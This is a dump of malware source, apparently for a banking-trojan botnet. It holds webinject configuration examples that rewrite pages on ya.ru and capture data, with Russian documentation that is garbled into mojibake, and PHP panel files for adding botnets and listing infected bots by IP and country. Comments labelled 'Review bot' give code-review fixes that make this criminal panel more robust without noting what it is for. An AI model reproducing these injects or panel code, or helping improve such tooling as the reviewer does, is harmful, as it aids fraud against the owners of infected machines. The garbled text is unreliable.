<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #2. <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
SET_URL http://ya.ru/ PG
DATA_BEFORE
<title>
DATA_END
DATA_AFTER
</title>
DATA_END
data_after
</body>
data_end
data_before
<body
data_end
DATA_INJECT
New Title
DATA_END
data_inject
>New Body
data_end
<EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_before <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_after <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_before <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_after <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject. <20> <20>.<2E>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #3. <20><><EFBFBD><EFBFBD><EFBFBD>:
set_url *Ya.Ru* GP
data_before
<T?T?E>
data_end
data_inject
MASK
data_end
data_after
</*>
data_end
<EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> ya.ru (<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) <20><><EFBFBD> GET <20> POST <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> MASK <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <T?T?E> <20> </*>. <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <title> <20> </title>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #4. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ GPL
data_before
<title>
data_end
data_inject
Grabbed Title
data_end
data_after
</title>
data_end
<EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> http://ya.ru/ <20><><EFBFBD> GET <20> POST <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <title> <20> </title> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> Grabbed Title.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> data_inject
%BOTUID% (<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
%BOTDATA_varname% (<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> varname
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> GET <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %SAVEDATA_varname=777% - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 777 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> varname
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: http://microsoft.com/?blabla%SAVEDATA_var1=one%blabla%SAVEDATA_var2=two%blabla
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> L <20> <20> <20><><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #1. <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
<title>
data_end
data_inject
#1
data_end
data_after
</title>
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_after
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> data_inject
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #2. <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
data_end
data_inject
data_end
data_after
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #3. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD>, data_inject <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
data_end
data_inject
#3
data_end
data_after
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> data_inject
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #4. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD>, data_before <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
<title>
data_end
data_inject
data_end
data_after
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #5. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_inject <20><><EFBFBD><EFBFBD><EFBFBD>, data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
data_end
data_inject
data_end
data_after
</title>
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #6. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, data_inject <20><><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
<title>
data_end
data_inject
data_end
data_after
</title>
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #7. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, data_before <20><><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
data_end
data_inject
#7
data_end
data_after
</title>
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_after
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> data_inject
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #8. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_inject <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, data_after <20><><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
<title>
data_end
data_inject
#8
data_end
data_after
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> data_inject


@@ -0,0 +1 @@
Options -Indexes


@@ -0,0 +1 @@
logs_ids=&bots_uids=&from_date=logs_120424&to_date=logs_120424&from_time=&to_time=&ip_mask%5B%5D=&ip_mask%5B%5D=&ip_mask%5B%5D=&ip_mask%5B%5D=&phrase=&limit=999


@@ -0,0 +1,44 @@
<?php
if (!BOT) exit();
if (isset($_POST['botnet'])) {
if (array_key_exists($_POST['botnet'], $BOTNETS)) exit('Botnet name already exist');
if (strlen($_POST['botnet']) > 12) exit('Botnet name too long');
if (!preg_match("/^[a-zA-Z0-9_]+$/", $_POST['botnet'])) exit('Botnet name tabcontains forbidden symbols');
if (strlen($_POST['passwd']) > 16) exit('Botnet password too long');
if (!preg_match("/^[a-zA-Z0-9_]+$/", $_POST['passwd'])) exit('Botnet password tabcontains forbidden symbols');
if (strlen($_POST['comment']) > 128) exit('Comment too long');
if ($_POST['comment']!='' and !preg_match("/^[a-zA-Z0-9\s.,_]+$/", $_POST['comment'])) exit('Comment tabcontains forbidden symbols');
$fp = fopen('../data/titles/botnets.php', 'a');
flock($fp, LOCK_EX);
fwrite ($fp, " \$BOTNETS['{$_POST['botnet']}'] = array('password' => '{$_POST['passwd']}', 'comment' => '{$_POST['comment']}');\n");
flock($fp, LOCK_UN);
fclose ($fp);
exit('success');
}
if (isset($_POST['supplier'])) {
if (array_key_exists($_POST['supplier'], $SUPPLIERS)) exit('Supplier name already exist');
if (strlen($_POST['supplier']) > 12) exit('Supplier name too long');
if (!preg_match("/^[a-zA-Z0-9_]+$/", $_POST['supplier'])) exit('Supplier name tabcontains forbidden symbols');
if (strlen($_POST['comment']) > 128) exit('Comment too long');
if ($_POST['comment']!='' and !preg_match("/^[a-zA-Z0-9\s.,_]+$/", $_POST['comment'])) exit('Comment tabcontains forbidden symbols');
$fp = fopen('../data/titles/suppliers.php', 'a');
flock($fp, LOCK_EX);
fwrite ($fp, " \$SUPPLIERS['{$_POST['supplier']}'] = array('comment' => '{$_POST['comment']}');\n");
flock($fp, LOCK_UN);
fclose ($fp);
exit('success');
}
exit();
?>
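Review bot: The guard `if (!BOT) exit();` at the top of this file does not stop a direct request on PHP 5/7, which the `mysql_*` and `get_magic_quotes_gpc()` calls elsewhere in this commit suggest it targets: an undefined constant evaluates to the string `'BOT'` with only a notice, that string is truthy, so `!BOT` is false and the file keeps executing without index.php having defined it. help.php uses the reliable form `if (!defined('BOT')) die;`, and every other include in this commit should match it with `if (!defined('BOT')) exit();`. Separately, the `fopen` result is passed to `flock`/`fwrite` without being checked in both branches, and `$_POST['passwd']` and `$_POST['comment']` are read without `isset`, so a request that omits them produces notices before the length checks run.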


@@ -0,0 +1,58 @@
<?php
if (!BOT) exit();
print "<table id='botnets' cellspacing=1 cellpadding=0 class='block'>
<tr class='bothdr'>
<td width=15%>BotNET</td>
<td width=15%>Password</td>
<td width=10%>Bots</td>
<td width=60%>Comment</td>
</tr>\n\n";
reset($BOTNETS);
while ($val = current($BOTNETS)) {
$key = key($BOTNETS);
print "<tr class='botstr'>
<td align=left>[ <b>{$key}</b> ]</td>
<td>{$val['password']}</td>
<td>200000</td>
<td>{$val['comment']}</td>
</tr>\n";
next($BOTNETS);
}
print "</table>
<form id='newbotnet'>
<table cellspacing=1 cellpadding=0 class='block'>
<tr>
<td width=15%><input type='text' name='botnet' maxlength=12 id='botnet'></td>
<td width=15%><input type='text' name='passwd' maxlength=16 id='passwd'></td>
<td width=60%><input type='text' name='comment' maxlength=128 id='comment'></td>
<td width=10%><input type='submit' value='Add new botnet' class='srchbtn'></td>
</tr>
</table>
</form>
<script>
$('#newbotnet').submit(function() {
var frm = $(this);
if ($(frm).find('#botnet').val() == '') { alert('Botnet name is not specified'); return false; }
if ($(frm).find('#passwd').val() == '') { alert('Botnet password is not specified'); return false; }
$(frm).find(':submit').attr('disabled', true);
$.post('?botnets', $(frm).serialize(), function(data) {
if (data == 'success') $('#botnets').append('<tr class=\'botstr\'><td align=left>[ <b>'+$(frm).find('#botnet').val()+'</b> ]</td><td>'+$(frm).find('#passwd').val()+'</td><td>200000</td><td>'+$(frm).find('#comment').val()+'</td></tr>');
else alert(data);
$(frm).find(':submit').attr('disabled', false);
});
return false;
});
</script>\n\n\n";
?>
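Review bot: The Bots column prints the literal `200000` for every row, and the JavaScript appends the same constant on success, so the table shows placeholder data; either compute the value or mark the column as not implemented in a comment. The `reset`/`current`/`next` walk over `$BOTNETS` reads more simply as `foreach ($BOTNETS as $key => $val) {` and does not depend on each value being truthy. `{$val['password']}` and `{$val['comment']}` are printed unescaped and rely on the whitelist regexes in botnets.act.php; wrapping them in `htmlspecialchars()` here makes this file correct on its own. botnets.suppliers.php is a copy of this file and has the same three points.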


@@ -0,0 +1,45 @@
<?php
if (!BOT) exit();
print "<table cellspacing=1 cellpadding=0 class=block>
<tr class=bothdr>
<td width=15%>UID</td>
<td width=4%>OS</td>
<td width=10%>[ISO] Country</td>
<td width=10%>IP</td>
<td width=10%>Time</td>
<td width=10%>Botnet</td>
<td width=10%>Supplier (sub)</td>
<td width=25%>Comment</td>
<td width=6%>Control</td>
</tr>\n";
$result = mysql_query("SELECT * FROM `bots` LIMIT 50;") or die("Query failed : " . mysql_error());
while ($row = mysql_fetch_array($result)) {
print "<tr class=botstr>
<td class=botleft><div style='width:180px;'>{$row['bot_uid']}</div></td>
<td>{$row['bot_os']}</td>
<td class=botleft><div style='width:119px;'>[{$row['bot_country']}] {$GeoIP->GEOIP_COUNTRY_NAMES[$GeoIP->GEOIP_COUNTRY_CODE_TO_NUMBER[$row['bot_country']]]}</div></td>
<td>{$row['bot_ip']}</td>
<td>".date("d/m/Y - H:i:s", $row['time_last'])."</td>
<td><div style='width:119px;'>[ {$row['bot_net']} ]</div></td>
<td><div style='width:119px;'>[ {$row['bot_supp']} ] ({$row['supp_sub']})</div></td>
<td class=botleft><div style='width:303px;'>{$row['comment']}</div></td>
<td>000</td>
</tr>\n";
}
print "</table>
<script>
</script>\n\n\n";
?>
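Review bot: Every `{$row[...]}` field from the `bots` table is interpolated into the HTML unescaped, whereas logs.act.php wraps `data` and `comment` in `htmlspecialchars()` before printing; these rows come from the same database and should be escaped the same way, e.g. `<td>".htmlspecialchars($row['bot_os'])."</td>`. The GeoIP lookup indexes `GEOIP_COUNTRY_CODE_TO_NUMBER` with `bot_country` directly, so an unknown or empty code produces an undefined-index notice inside the table cell. `LIMIT 50` is hard-coded with no paging and the Control column prints the placeholder `000`; both should be called out as unfinished in a comment.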


@@ -0,0 +1,62 @@
<?php
